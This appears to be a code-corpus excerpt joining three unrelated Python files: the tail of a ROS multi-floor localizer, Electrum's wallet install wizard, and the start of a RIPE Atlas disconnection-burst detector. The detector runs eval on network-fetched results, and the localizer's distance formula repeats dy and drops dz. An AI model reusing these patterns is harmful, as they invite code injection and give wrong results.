multi_floor_manager.ble_localizer_dict[floor][area][mode] = floor_manager
# convert samples to the coordinate of global_anchor
samples_global = convert_samples_coordinate(samples, anchor, global_anchor, floor)
samples_global_all.extend(samples_global)
# calculate static transform
xy = geoutil.global2local(anchor, global_anchor)
yaw = - math.radians(anchor.rotate - global_anchor.rotate)
t = TransformStamped()
t.header.stamp = rospy.Time.now()
t.header.frame_id = multi_floor_manager.global_map_frame
t.child_frame_id = frame_id
z = floor * meters_per_floor # for visualization
trans = Vector3(xy.x, xy.y, z)
t.transform.translation = trans
q = tf_conversions.transformations.quaternion_from_euler(0, 0, yaw, 'sxyz')
rotation = Quaternion(*q)
t.transform.rotation = rotation
multi_floor_manager.transforms.append(t)
multi_floor_manager.floor_list = list(floor_set)
# a localizer to estimate floor
multi_floor_manager.ble_floor_localizer = SimpleRSSLocalizer(n_neighbors=n_neighbors_floor, min_beacons=min_beacons_floor, rssi_offset=rssi_offset)
multi_floor_manager.ble_floor_localizer.fit(samples_global_all)
# area localizer
X_area = []
Y_area = []
for s in samples_global_all:
x_a = float(s["information"]["x"])
y_a = float(s["information"]["y"])
f_a = float(s["information"]["floor"])
f_a = f_a * multi_floor_manager.area_floor_const
X_area.append([x_a, y_a, f_a])
area = int(s["information"]["area"])
Y_area.append(area)
from sklearn.neighbors import KNeighborsClassifier
area_classifier = KNeighborsClassifier(n_neighbors=1)
area_classifier.fit(X_area, Y_area)
multi_floor_manager.area_localizer = area_classifier
# global subscribers
imu_sub = rospy.Subscriber("imu", Imu, multi_floor_manager.imu_callback)
scan_sub = rospy.Subscriber("scan", LaserScan, multi_floor_manager.scan_callback)
points2_sub = rospy.Subscriber("points2", PointCloud2, multi_floor_manager.points_callback)
beacons_sub = rospy.Subscriber("beacons", String, multi_floor_manager.beacons_callback, queue_size=1)
initialpose_sub = rospy.Subscriber("initialpose", PoseWithCovarianceStamped, multi_floor_manager.initialpose_callback)
odom_sub = rospy.Subscriber("odom", Odometry, multi_floor_manager.odom_callback)
# services
stop_localization_service = rospy.Service("stop_localization", StopLocalization, multi_floor_manager.stop_localization_callback)
start_localization_service = rospy.Service("start_localization", StartLocalization, multi_floor_manager.start_localization_callback)
restart_localization_service = rospy.Service("restart_localization", RestartLocalization, multi_floor_manager.restart_localization_callback)
enable_relocalization_service = rospy.Service("enable_auto_relocalization", MFTrigger, multi_floor_manager.enable_relocalization_callback)
disable_relocalization_service = rospy.Service("disable_auto_relocalization", MFTrigger, multi_floor_manager.disable_relocalization_callback)
set_current_floor_service = rospy.Service("set_current_floor", MFSetInt, multi_floor_manager.set_current_floor_callback)
convert_local_to_global_service = rospy.Service("convert_local_to_global", ConvertLocalToGlobal, multi_floor_manager.convert_local_to_global_callback)
# publish map->local_map by /tf_static
multi_floor_manager.send_static_transforms()
# timers
timer_duration = 0.01 # 100 Hz
# publish current_frame -> map when map_frame is not defined by global_map_frame
# if global_map_frame == local_map_frame, local_map_frame is used to represent the origin of the global map
# if global_map_frame != local_map_frame, local_map_frame is used to represent the origin of the local map corresponding to the origin of current_frame
if multi_floor_manager.local_map_frame != multi_floor_manager.global_map_frame:
local_map_tf_timer = rospy.Timer(rospy.Duration(timer_duration), multi_floor_manager.local_map_tf_timer_callback)
# global position
global_position_timer = rospy.Timer(rospy.Duration(global_position_interval), multi_floor_manager.global_position_callback)
# detect optimization
multi_floor_manager.map2odom = None
# ros spin
spin_rate = 10 # 10 Hz
r = rospy.Rate(spin_rate)
# for loginfo
log_interval = spin_rate # loginfo at about 1 Hz
while not rospy.is_shutdown():
# detect odom movement
try:
t = tfBuffer.lookup_transform(multi_floor_manager.global_map_frame, multi_floor_manager.odom_frame, rospy.Time(0))
if multi_floor_manager.is_active:
if multi_floor_manager.map2odom is not None:
map2odom = multi_floor_manager.map2odom # local variable
dx = map2odom.transform.translation.x - t.transform.translation.x
dy = map2odom.transform.translation.y - t.transform.translation.y
dz = map2odom.transform.translation.z - t.transform.translation.z
dist = np.sqrt(dx**2 + dy**2 + dy**2)
if odom_dist_th < dist:
multi_floor_manager.optimization_detected = True
multi_floor_manager.odom_displacement = dist
multi_floor_manager.map2odom = t
except (tf2_ros.LookupException, tf2_ros.ConnectivityException, tf2_ros.ExtrapolationException):
if (multi_floor_manager.prev_spin_count is None
or multi_floor_manager.spin_count - multi_floor_manager.prev_spin_count > log_interval):
multi_floor_manager.prev_spin_count = multi_floor_manager.spin_count
rospy.loginfo('LookupTransform Error '+multi_floor_manager.global_map_frame+" -> "+multi_floor_manager.odom_frame)
multi_floor_manager.spin_count += 1
r.sleep()
|
installwizard.py
|
# Copyright (C) 2018 The Electrum developers
# Distributed under the MIT software license, see the accompanying
# file LICENCE or http://www.opensource.org/licenses/mit-license.php
import os
import sys
import threading
import traceback
from typing import Tuple, List, Callable, NamedTuple, Optional
from PyQt5.QtCore import QRect, QEventLoop, Qt, pyqtSignal
from PyQt5.QtGui import QPalette, QPen, QPainter, QPixmap
from PyQt5.QtWidgets import (QWidget, QDialog, QLabel, QHBoxLayout, QMessageBox,
QVBoxLayout, QLineEdit, QFileDialog, QPushButton,
QGridLayout, QSlider, QScrollArea)
from electrum.wallet import Wallet, Abstract_Wallet
from electrum.storage import WalletStorage
from electrum.util import UserCancelled, InvalidPassword, WalletFileException
from electrum.base_wizard import BaseWizard, HWD_SETUP_DECRYPT_WALLET, GoBack
from electrum.i18n import _
from .seed_dialog import SeedLayout, KeysLayout
from .network_dialog import NetworkChoiceLayout
from .util import (MessageBoxMixin, Buttons, icon_path, ChoicesLayout, WWLabel,
InfoButton)
from .password_dialog import PasswordLayout, PasswordLayoutForHW, PW_NEW
from electrum.plugin import run_hook
MSG_ENTER_PASSWORD = _("Choose a password to encrypt your wallet keys.") + '\n'\
+ _("Leave this field empty if you want to disable encryption.")
MSG_HW_STORAGE_ENCRYPTION = _("Set wallet file encryption.") + '\n'\
+ _("Your wallet file does not contain secrets, mostly just metadata. ") \
+ _("It also contains your master public key that allows watching your addresses.") + '\n\n'\
+ _("Note: If you enable this setting, you will need your hardware device to open your wallet.")
WIF_HELP_TEXT = (_('WIF keys are typed in Electrum, based on script type.') + '\n\n' +
_('A few examples') + ':\n' +
'p2pkh:KxZcY47uGp9a... \t-> 1DckmggQM...\n' +
'p2wpkh-p2sh:KxZcY47uGp9a... \t-> 3NhNeZQXF...\n' +
'p2wpkh:KxZcY47uGp9a... \t-> bc1q3fjfk...')
# note: full key is KxZcY47uGp9aVQAb6VVvuBs8SwHKgkSR2DbZUzjDzXf2N2GPhG9n
MSG_PASSPHRASE_WARN_ISSUE4566 = _("Warning") + ": "\
+ _("You have multiple consecutive whitespaces or leading/trailing "
"whitespaces in your passphrase.") + " " \
+ _("This is discouraged.") + " " \
+ _("Due to a bug, old versions of Electrum will NOT be creating the "
"same wallet as newer versions or other software.")
class CosignWidget(QWidget):
size = 120
def __init__(self, m, n):
QWidget.__init__(self)
self.R = QRect(0, 0, self.size, self.size)
self.setGeometry(self.R)
self.setMinimumHeight(self.size)
self.setMaximumHeight(self.size)
self.m = m
self.n = n
def set_n(self, n):
self.n = n
self.update()
def set_m(self, m):
self.m = m
self.update()
def paintEvent(self, event):
bgcolor = self.palette().color(QPalette.Background)
pen = QPen(bgcolor, 7, Qt.SolidLine)
qp = QPainter()
qp.begin(self)
qp.setPen(pen)
qp.setRenderHint(QPainter.Antialiasing)
qp.setBrush(Qt.gray)
for i in range(self.n):
alpha = int(16* 360 * i/self.n)
alpha2 = int(16* 360 * 1/self.n)
qp.setBrush(Qt.green if i<self.m else Qt.gray)
qp.drawPie(self.R, alpha, alpha2)
qp.end()
def wizard_dialog(func):
def func_wrapper(*args, **kwargs):
run_next = kwargs['run_next']
wizard = args[0]
wizard.back_button.setText(_('Back') if wizard.can_go_back() else _('Cancel'))
try:
out = func(*args, **kwargs)
except GoBack:
wizard.go_back() if wizard.can_go_back() else wizard.close()
return
except UserCancelled:
return
#if out is None:
# out = ()
if type(out) is not tuple:
out = (out,)
run_next(*out)
return func_wrapper
class WalletAlreadyOpenInMemory(Exception):
def __init__(self, wallet: Abstract_Wallet):
super().__init__()
self.wallet = wallet
# WindowModalDialog must come first as it overrides show_error
class InstallWizard(QDialog, MessageBoxMixin, BaseWizard):
accept_signal = pyqtSignal()
def __init__(self, config, app, plugins):
BaseWizard.__init__(self, config, plugins)
QDialog.__init__(self, None)
self.setWindowTitle('Electrum - ' + _('Install Wizard'))
self.app = app
self.config = config
# Set for base base class
self.language_for_seed = config.get('language')
self.setMinimumSize(600, 400)
self.accept_signal.connect(self.accept)
self.title = QLabel()
self.main_widget = QWidget()
self.back_button = QPushButton(_("Back"), self)
self.back_button.setText(_('Back') if self.can_go_back() else _('Cancel'))
self.next_button = QPushButton(_("Next"), self)
self.next_button.setDefault(True)
self.logo = QLabel()
self.please_wait = QLabel(_("Please wait..."))
self.please_wait.setAlignment(Qt.AlignCenter)
self.icon_filename = None
self.loop = QEventLoop()
self.rejected.connect(lambda: self.loop.exit(0))
self.back_button.clicked.connect(lambda: self.loop.exit(1))
self.next_button.clicked.connect(lambda: self.loop.exit(2))
outer_vbox = QVBoxLayout(self)
inner_vbox = QVBoxLayout()
inner_vbox.addWidget(self.title)
inner_vbox.addWidget(self.main_widget)
inner_vbox.addStretch(1)
inner_vbox.addWidget(self.please_wait)
inner_vbox.addStretch(1)
scroll_widget = QWidget()
scroll_widget.setLayout(inner_vbox)
scroll = QScrollArea()
scroll.setWidget(scroll_widget)
scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)
scroll.setWidgetResizable(True)
icon_vbox = QVBoxLayout()
icon_vbox.addWidget(self.logo)
icon_vbox.addStretch(1)
hbox = QHBoxLayout()
hbox.addLayout(icon_vbox)
hbox.addSpacing(5)
hbox.addWidget(scroll)
hbox.setStretchFactor(scroll, 1)
outer_vbox.addLayout(hbox)
outer_vbox.addLayout(Buttons(self.back_button, self.next_button))
self.set_icon('electrum.png')
self.show()
self.raise_()
self.refresh_gui() # Need for QT on MacOSX. Lame.
def select_storage(self, path, get_wallet_from_daemon) -> Tuple[str, Optional[WalletStorage]]:
vbox = QVBoxLayout()
hbox = QHBoxLayout()
hbox.addWidget(QLabel(_('Wallet') + ':'))
self.name_e = QLineEdit()
hbox.addWidget(self.name_e)
button = QPushButton(_('Choose...'))
hbox.addWidget(button)
vbox.addLayout(hbox)
self.msg_label = QLabel('')
vbox.addWidget(self.msg_label)
hbox2 = QHBoxLayout()
self.pw_e = QLineEdit('', self)
self.pw_e.setFixedWidth(150)
self.pw_e.setEchoMode(2)
self.pw_label = QLabel(_('Password') + ':')
hbox2.addWidget(self.pw_label)
hbox2.addWidget(self.pw_e)
hbox2.addStretch()
vbox.addLayout(hbox2)
self.set_layout(vbox, title=_('Electrum wallet'))
self.temp_storage = WalletStorage(path, manual_upgrades=True)
wallet_folder = os.path.dirname(self.temp_storage.path)
def on_choose():
path, __ = QFileDialog.getOpenFileName(self, "Select your wallet file", wallet_folder)
if path:
self.name_e.setText(path)
def on_filename(filename):
path = os.path.join(wallet_folder, filename)
wallet_from_memory = get_wallet_from_daemon(path)
try:
if wallet_from_memory:
self.temp_storage = wallet_from_memory.storage
else:
self.temp_storage = WalletStorage(path, manual_upgrades=True)
self.next_button.setEnabled(True)
except BaseException:
traceback.print_exc(file=sys.stderr)
self.temp_storage = None
self.next_button.setEnabled(False)
user_needs_to_enter_password = False
if self.temp_storage:
if not self.temp_storage.file_exists():
msg =_("This file does not exist.") + '\n' \
+ _("Press 'Next' to create this wallet, or choose another file.")
elif not wallet_from_memory:
if self.temp_storage.is_encrypted_with_user_pw():
msg = _("This file is encrypted with a password.") + '\n' \
+ _('Enter your password or choose another file.')
user_needs_to_enter_password = True
elif self.temp_storage.is_encrypted_with_hw_device():
msg = _("This file is encrypted using a hardware device.") + '\n' \
+ _("Press 'Next' to choose device to decrypt.")
else:
msg = _("Press 'Next' to open this wallet.")
else:
msg = _("This file is already open in memory.") + "\n" \
+ _("Press 'Next' to create/focus window.")
else:
msg = _('Cannot read file')
self.msg_label.setText(msg)
if user_needs_to_enter_password:
self.pw_label.show()
self.pw_e.show()
self.pw_e.setFocus()
else:
self.pw_label.hide()
self.pw_e.hide()
button.clicked.connect(on_choose)
self.name_e.textChanged.connect(on_filename)
n = os.path.basename(self.temp_storage.path)
self.name_e.setText(n)
while True:
if self.loop.exec_() != 2: # 2 = next
raise UserCancelled
if self.temp_storage.file_exists() and not self.temp_storage.is_encrypted():
break
if not self.temp_storage.file_exists():
break
wallet_from_memory = get_wallet_from_daemon(self.temp_storage.path)
if wallet_from_memory:
raise WalletAlreadyOpenInMemory(wallet_from_memory)
if self.temp_storage.file_exists() and self.temp_storage.is_encrypted():
if self.temp_storage.is_encrypted_with_user_pw():
password = self.pw_e.text()
try:
self.temp_storage.decrypt(password)
break
except InvalidPassword as e:
QMessageBox.information(None, _('Error'), str(e))
continue
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
elif self.temp_storage.is_encrypted_with_hw_device():
try:
self.run('choose_hw_device', HWD_SETUP_DECRYPT_WALLET, storage=self.temp_storage)
except InvalidPassword as e:
QMessageBox.information(
None, _('Error'),
_('Failed to decrypt using this hardware device.') + '\n' +
_('If you use a passphrase, make sure it is correct.'))
self.reset_stack()
return self.select_storage(path, get_wallet_from_daemon)
except BaseException as e:
traceback.print_exc(file=sys.stdout)
QMessageBox.information(None, _('Error'), str(e))
raise UserCancelled()
if self.temp_storage.is_past_initial_decryption():
break
else:
raise UserCancelled()
else:
raise Exception('Unexpected encryption version')
return self.temp_storage.path, (self.temp_storage if self.temp_storage.file_exists() else None)
def run_upgrades(self, storage):
path = storage.path
if storage.requires_split():
self.hide()
msg = _("The wallet '{}' contains multiple accounts, which are no longer supported since Electrum 2.7.\n\n"
"Do you want to split your wallet into multiple files?").format(path)
if not self.question(msg):
return
file_list = '\n'.join(storage.split_accounts())
msg = _('Your accounts have been moved to') + ':\n' + file_list + '\n\n'+ _('Do you want to delete the old file') + ':\n' + path
if self.question(msg):
os.remove(path)
self.show_warning(_('The file was removed'))
# raise now, to avoid having the old storage opened
raise UserCancelled()
action = storage.get_action()
if action and storage.requires_upgrade():
raise WalletFileException('Incomplete wallet files cannot be upgraded.')
if action:
self.hide()
msg = _("The file '{}' contains an incompletely created wallet.\n"
"Do you want to complete its creation now?").format(path)
if not self.question(msg):
if self.question(_("Do you want to delete '{}'?").format(path)):
os.remove(path)
self.show_warning(_('The file was removed'))
return
self.show()
self.data = storage.db.data # FIXME
self.run(action)
for k, v in self.data.items():
storage.put(k, v)
storage.write()
return
if storage.requires_upgrade():
self.upgrade_storage(storage)
def finished(self):
"""Called in hardware client wrapper, in order to close popups."""
return
def on_error(self, exc_info):
if not isinstance(exc_info[1], UserCancelled):
traceback.print_exception(*exc_info)
self.show_error(str(exc_info[1]))
def set_icon(self, filename):
prior_filename, self.icon_filename = self.icon_filename, filename
self.logo.setPixmap(QPixmap(icon_path(filename))
.scaledToWidth(60, mode=Qt.SmoothTransformation))
return prior_filename
def set_layout(self, layout, title=None, next_enabled=True):
self.title.setText("<b>%s</b>"%title if title else "")
self.title.setVisible(bool(title))
# Get rid of any prior layout by assigning it to a temporary widget
prior_layout = self.main_widget.layout()
if prior_layout:
QWidget().setLayout(prior_layout)
self.main_widget.setLayout(layout)
self.back_button.setEnabled(True)
self.next_button.setEnabled(next_enabled)
if next_enabled:
self.next_button.setFocus()
self.main_widget.setVisible(True)
self.please_wait.setVisible(False)
def exec_layout(self, layout, title=None, raise_on_cancel=True,
next_enabled=True):
self.set_layout(layout, title, next_enabled)
result = self.loop.exec_()
if not result and raise_on_cancel:
raise UserCancelled
if result == 1:
raise GoBack from None
self.title.setVisible(False)
self.back_button.setEnabled(False)
self.next_button.setEnabled(False)
self.main_widget.setVisible(False)
self.please_wait.setVisible(True)
self.refresh_gui()
return result
def refresh_gui(self):
# For some reason, to refresh the GUI this needs to be called twice
self.app.processEvents()
self.app.processEvents()
def remove_from_recently_open(self, filename):
self.config.remove_from_recently_open(filename)
def text_input(self, title, message, is_valid, allow_multi=False):
slayout = KeysLayout(parent=self, header_layout=message, is_valid=is_valid,
allow_multi=allow_multi)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_text()
def seed_input(self, title, message, is_seed, options):
slayout = SeedLayout(title=message, is_seed=is_seed, options=options, parent=self)
self.exec_layout(slayout, title, next_enabled=False)
return slayout.get_seed(), slayout.is_bip39, slayout.is_ext
@wizard_dialog
def add_xpub_dialog(self, title, message, is_valid, run_next, allow_multi=False, show_wif_help=False):
header_layout = QHBoxLayout()
label = WWLabel(message)
label.setMinimumWidth(400)
header_layout.addWidget(label)
if show_wif_help:
header_layout.addWidget(InfoButton(WIF_HELP_TEXT), alignment=Qt.AlignRight)
return self.text_input(title, header_layout, is_valid, allow_multi)
@wizard_dialog
def add_cosigner_dialog(self, run_next, index, is_valid):
title = _("Add Cosigner") + " %d"%index
message = ' '.join([
_('Please enter the master public key (xpub) of your cosigner.'),
_('Enter their master private key (xprv) if you want to be able to sign for them.')
])
return self.text_input(title, message, is_valid)
@wizard_dialog
def restore_seed_dialog(self, run_next, test):
options = []
if self.opt_ext:
options.append('ext')
if self.opt_bip39:
options.append('bip39')
title = _('Enter Seed')
message = _('Please enter your seed phrase in order to restore your wallet.')
return self.seed_input(title, message, test, options)
@wizard_dialog
def confirm_seed_dialog(self, run_next, test):
self.app.clipboard().clear()
title = _('Confirm Seed')
message = ' '.join([
_('Your seed is important!'),
_('If you lose your seed, your money will be permanently lost.'),
_('To make sure that you have properly saved your seed, please retype it here.')
])
seed, is_bip39, is_ext = self.seed_input(title, message, test, None)
return seed
@wizard_dialog
def show_seed_dialog(self, run_next, seed_text):
title = _("Your wallet generation seed is:")
slayout = SeedLayout(seed=seed_text, title=title, msg=True, options=['ext'])
self.exec_layout(slayout)
return slayout.is_ext
def pw_layout(self, msg, kind, force_disable_encrypt_cb):
playout = PasswordLayout(msg=msg, kind=kind, OK_button=self.next_button,
force_disable_encrypt_cb=force_disable_encrypt_cb)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.new_password(), playout.encrypt_cb.isChecked()
@wizard_dialog
def request_password(self, run_next, force_disable_encrypt_cb=False):
"""Request the user enter a new password and confirm it. Return
the password or None for no password."""
return self.pw_layout(MSG_ENTER_PASSWORD, PW_NEW, force_disable_encrypt_cb)
@wizard_dialog
def request_storage_encryption(self, run_next):
playout = PasswordLayoutForHW(MSG_HW_STORAGE_ENCRYPTION)
playout.encrypt_cb.setChecked(True)
self.exec_layout(playout.layout())
return playout.encrypt_cb.isChecked()
@wizard_dialog
def confirm_dialog(self, title, message, run_next):
self.confirm(message, title)
def confirm(self, message, title):
label = WWLabel(message)
vbox = QVBoxLayout()
vbox.addWidget(label)
self.exec_layout(vbox, title)
@wizard_dialog
def action_dialog(self, action, run_next):
self.run(action)
def terminate(self, **kwargs):
self.accept_signal.emit()
def waiting_dialog(self, task, msg, on_finished=None):
label = WWLabel(msg)
vbox = QVBoxLayout()
vbox.addSpacing(100)
label.setMinimumWidth(300)
label.setAlignment(Qt.AlignCenter)
vbox.addWidget(label)
self.set_layout(vbox, next_enabled=False)
self.back_button.setEnabled(False)
t = threading.Thread(target=task)
t.start()
while True:
t.join(1.0/60)
if t.is_alive():
self.refresh_gui()
else:
break
if on_finished:
on_finished()
@wizard_dialog
def choice_dialog(self, title, message, choices, run_next):
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
clayout = ChoicesLayout(message, c_titles)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, title)
action = c_values[clayout.selected_index()]
return action
def query_choice(self, msg, choices):
"""called by hardware wallets"""
clayout = ChoicesLayout(msg, choices)
vbox = QVBoxLayout()
vbox.addLayout(clayout.layout())
self.exec_layout(vbox, '')
return clayout.selected_index()
@wizard_dialog
def choice_and_line_dialog(self, title: str, message1: str, choices: List[Tuple[str, str, str]],
message2: str, test_text: Callable[[str], int],
run_next, default_choice_idx: int=0) -> Tuple[str, str]:
vbox = QVBoxLayout()
c_values = [x[0] for x in choices]
c_titles = [x[1] for x in choices]
c_default_text = [x[2] for x in choices]
def on_choice_click(clayout):
idx = clayout.selected_index()
line.setText(c_default_text[idx])
clayout = ChoicesLayout(message1, c_titles, on_choice_click,
checked_index=default_choice_idx)
vbox.addLayout(clayout.layout())
vbox.addSpacing(50)
vbox.addWidget(WWLabel(message2))
line = QLineEdit()
def on_text_change(text):
self.next_button.setEnabled(test_text(text))
line.textEdited.connect(on_text_change)
on_choice_click(clayout) # set default text for "line"
vbox.addWidget(line)
self.exec_layout(vbox, title)
choice = c_values[clayout.selected_index()]
return str(line.text()), choice
@wizard_dialog
def line_dialog(self, run_next, title, message, default, test, warning='',
presets=(), warn_issue4566=False):
vbox = QVBoxLayout()
vbox.addWidget(WWLabel(message))
line = QLineEdit()
line.setText(default)
def f(text):
self.next_button.setEnabled(test(text))
if warn_issue4566:
text_whitespace_normalised = ' '.join(text.split())
warn_issue4566_label.setVisible(text != text_whitespace_normalised)
line.textEdited.connect(f)
vbox.addWidget(line)
vbox.addWidget(WWLabel(warning))
warn_issue4566_label = WWLabel(MSG_PASSPHRASE_WARN_ISSUE4566)
warn_issue4566_label.setVisible(False)
vbox.addWidget(warn_issue4566_label)
for preset in presets:
button = QPushButton(preset[0])
button.clicked.connect(lambda __, text=preset[1]: line.setText(text))
button.setMinimumWidth(150)
hbox = QHBoxLayout()
hbox.addWidget(button, alignment=Qt.AlignCenter)
vbox.addLayout(hbox)
self.exec_layout(vbox, title, next_enabled=test(default))
return line.text()
@wizard_dialog
def show_xpub_dialog(self, xpub, run_next):
msg = ' '.join([
_("Here is your master public key."),
_("Please share it with your cosigners.")
])
vbox = QVBoxLayout()
layout = SeedLayout(xpub, title=msg, icon=False, for_seed_words=False)
vbox.addLayout(layout.layout())
self.exec_layout(vbox, _('Master Public Key'))
return None
def init_network(self, network):
message = _("Electrum communicates with remote servers to get "
"information about your transactions and addresses. The "
"servers all fulfill the same purpose only differing in "
"hardware. In most cases you simply want to let Electrum "
"pick one at random. However if you prefer feel free to "
"select a server manually.")
choices = [_("Auto connect"), _("Select server manually")]
title = _("How do you want to connect to a server? ")
clayout = ChoicesLayout(message, choices)
self.back_button.setText(_('Cancel'))
self.exec_layout(clayout.layout(), title)
r = clayout.selected_index()
if r == 1:
nlayout = NetworkChoiceLayout(network, self.config, wizard=True)
if self.exec_layout(nlayout.layout()):
nlayout.accept()
else:
network.auto_connect = True
self.config.set_key('auto_connect', True, True)
@wizard_dialog
def multisig_dialog(self, run_next):
cw = CosignWidget(2, 2)
m_edit = QSlider(Qt.Horizontal, self)
n_edit = QSlider(Qt.Horizontal, self)
n_edit.setMinimum(2)
n_edit.setMaximum(15)
m_edit.setMinimum(1)
m_edit.setMaximum(2)
n_edit.setValue(2)
m_edit.setValue(2)
n_label = QLabel()
m_label = QLabel()
grid = QGridLayout()
grid.addWidget(n_label, 0, 0)
grid.addWidget(n_edit, 0, 1)
grid.addWidget(m_label, 1, 0)
grid.addWidget(m_edit, 1, 1)
def on_m(m):
m_label.setText(_('Require {0} signatures').format(m))
cw.set_m(m)
def on_n(n):
n_label.setText(_('From {0} cosigners').format(n))
cw.set_n(n)
m_edit.setMaximum(n)
n_edit.valueChanged.connect(on_n)
m_edit.valueChanged.connect(on_m)
on_n(2)
on_m(2)
vbox = QVBoxLayout()
vbox.addWidget(cw)
vbox.addWidget(WWLabel(_("Choose the number of signatures needed to unlock funds in your wallet:")))
vbox.addLayout(grid)
self.exec_layout(vbox, _("Multi-Signature Wallet"))
m = int(m_edit.value())
n = int(n_edit.value())
return (m, n)
|
disco.py
|
from __future__ import division, print_function
import configparser
import json
import logging
import os
import sys
import threading
import time
import traceback
import Queue
import numpy as np
import pybursts
from probeEnrichInfo import probeEnrichInfo
from pprint import PrettyPrinter
import gzip
import collections
from os import listdir
from os.path import isfile, join
from datetime import datetime
from ripe.atlas.cousteau import AtlasResultsRequest
from output_writer import outputWriter
"""Methods for atlas stream"""
class ConnectionError(Exception):
def __init__(self, value):
self.value = value
def __str__(self):
return repr(self.value)
def on_result_response(*args):
"""
Function that will be called every time we receive a new result.
Args is a tuple, so you should use args[0] to access the real message.
"""
# print args[0]
item = args[0]
event = eval(str(item))
# print(event)
dataList.append(event)
if DETECT_DISCO_BURST:
if event["event"] == "disconnect":
dataQueueDisconnect.put(event)
if DETECT_CON_BURST:
if event["event"] == "connect":
dataQueueConnect.put(event)
def on_error(*args):
# print "got in on_error"
# print args
raise ConnectionError("Error")
def on_connect(*args):
# print "got in on_connect"
# print args
return
def on_reconnect(*args):
# print "got in on_reconnect"
# print args
# raise ConnectionError("Reconnection")
return
def on_close(*args):
# print "got in on_close"
# print args
raise ConnectionError("Closed")
def on_disconnect(*args):
# print "got in on_disconnect"
# print args
# raise ConnectionError("Disconnection")
return
def on_connect_error(*args):
# print "got in on_connect_error"
# print args
raise ConnectionError("Connection Error")
def on_atlas_error(*args):
# print "got in on_atlas_error"
# print args
return
def on_atlas_unsubscribe(*args):
# print "got in on_atlas_unsubscribe"
# print args
raise ConnectionError("Unsubscribed")
def getLiveRestAPI():
WINDOW = 600
global READ_OK
currentTS = int((datetime.utcnow() - datetime.utcfromtimestamp(0)).total_seconds())
while True:
try:
kwargs = {
"msm_id": 7000,
"start": datetime.utcfromtimestamp(currentTS - WINDOW),
"stop": datetime.utcfromtimestamp(currentTS),
}
is_success, results = AtlasResultsRequest(**kwargs).create()
READ_OK = False
if is_success:
for ent in results:
on_result_response(ent)
READ_OK = True
time.sleep(WINDOW)
currentTS += (WINDOW + 1)
except:
traceback.print_exc()
""""""
def getCleanVal(val, tsClean):
newVal = val + 1
while newVal in tsClean:
newVal = val + 1
return newVal
def getTimeStampsForBurstyProbes(burstyProbes,burstDict,burstEventDict):
burstyProbeInfoDict={}
for event in dataList:
if event["event"] == "disconnect":
eventTime=float(event['timestamp'])
pid=event["prb_id"]
if pid in burstyProbes:
for state,timeDictList in burstDict.items():
if state >= BURST_THRESHOLD:
eventID=getEventID(burstEventDict,event)
for timeDict in timeDictList:
if eventID and eventTime>=timeDict['start'] and eventTime<=timeDict['end']:
if pid not in burstyProbeInfoDict.keys():
burstyProbeInfoDict[pid]={}
if state not in burstyProbeInfoDict[pid].keys():
burstyProbeInfoDict[pid][state]={}
if eventID not in burstyProbeInfoDict[pid][state].keys():
burstyProbeInfoDict[pid][state][eventID]=[]
burstyProbeInfoDict[pid][state][eventID].append(event["timestamp"])
#pp.pprint(burstyProbeInfoDict)
return burstyProbeInfoDict
def correlateWithConnectionEvents(burstyProbeInfoDictIn):
# Extremely unoptimized way to do this. Need to rewrite this function.
#pp.pprint(burstyProbeInfoDict)
burstyProbeInfoDict=burstyProbeInfoDictIn
allInBurstIDs=[]
burstyProbeDurations={}
for event in dataList:
if event["event"] == "connect":
pid=event["prb_id"]
if pid in burstyProbeInfoDict.keys():
for state in burstyProbeInfoDict[pid].keys():
for burstID,tmpSList in burstyProbeInfoDict[pid][state].items():
allInBurstIDs.append(burstID)
for tmpS in tmpSList:
eventTS=float(event["timestamp"])
if eventTS >tmpS:
burstyProbeInfoDict[pid][state][burstID].remove(tmpS)
duration=eventTS-tmpS
if burstID not in burstyProbeDurations.keys():
burstyProbeDurations[burstID]={}
if pid not in burstyProbeDurations[burstID].keys():
burstyProbeDurations[burstID][pid]={}
if state not in burstyProbeDurations[burstID][pid].keys():
burstyProbeDurations[burstID][pid][state]=[]
burstyProbeDurations[burstID][pid][state].append({"disconnect":tmpS,"connect":eventTS,"duration":duration})
# Remove cases where only less than half probes connected
cleanBurstyProbeDurations={}
ongoingBurstIDs=[]
for bid in burstyProbeDurations.keys():
lenProbeConnVal=len(burstyProbeDurations[bid])
if lenProbeConnVal >= float(len(burstyProbeInfoDict.keys()))/2:
cleanBurstyProbeDurations[bid]=burstyProbeDurations[bid]
burstyProbeDurationsOngoing={}
'''
for pid in burstyProbeInfoDict.keys():
for state in burstyProbeInfoDict[pid].keys():
for burstID, tmpSList in burstyProbeInfoDict[pid][state].items():
if burstID in cleanBurstyProbeDurations.keys():
continue
for tmpS in tmpSList:
if burstID not in burstyProbeDurationsOngoing.keys():
burstyProbeDurationsOngoing[burstID] = {}
if pid not in burstyProbeDurationsOngoing[burstID].keys():
burstyProbeDurationsOngoing[burstID][pid] = {}
if state not in burstyProbeDurationsOngoing[burstID][pid].keys():
burstyProbeDurationsOngoing[burstID][pid][state] = []
burstyProbeDurationsOngoing[burstID][pid][state].append(
{"disconnect": tmpS, "connect": -1, "duration": -1})
'''
return burstyProbeDurationsOngoing,cleanBurstyProbeDurations
def getUniqueSignalInEvents(eventList):
signalMapCountries = {}
masterProbeLocList = []
seenProbes = set()
probeIDFilterByDistance = {}
for event in eventList:
try:
probeID = int(event['prb_id'])
if 'All' not in signalMapCountries.keys():
signalMapCountries['All'] = set()
signalMapCountries['All'].add(probeID)
if SPLIT_SIGNAL:
try:
country = probeInfo.probeIDToCountryDict[probeID]
if country not in signalMapCountries.keys():
signalMapCountries[country] = set()
signalMapCountries[country].add(probeID)
except:
# No country code available
pass
try:
asn = int(probeInfo.probeIDToASNDict[probeID])
if asn not in signalMapCountries.keys():
signalMapCountries[asn] = set()
signalMapCountries[asn].add(probeID)
except:
# No ASN available
pass
try:
locDict = probeInfo.probeIDToLocDict[probeID]
if probeID not in seenProbes:
masterProbeLocList.append([probeID, locDict['lat'], locDict['lon']])
seenProbes.add(probeID)
except:
traceback.print_exc()
except:
pass # Not a valid event
if SPLIT_SIGNAL:
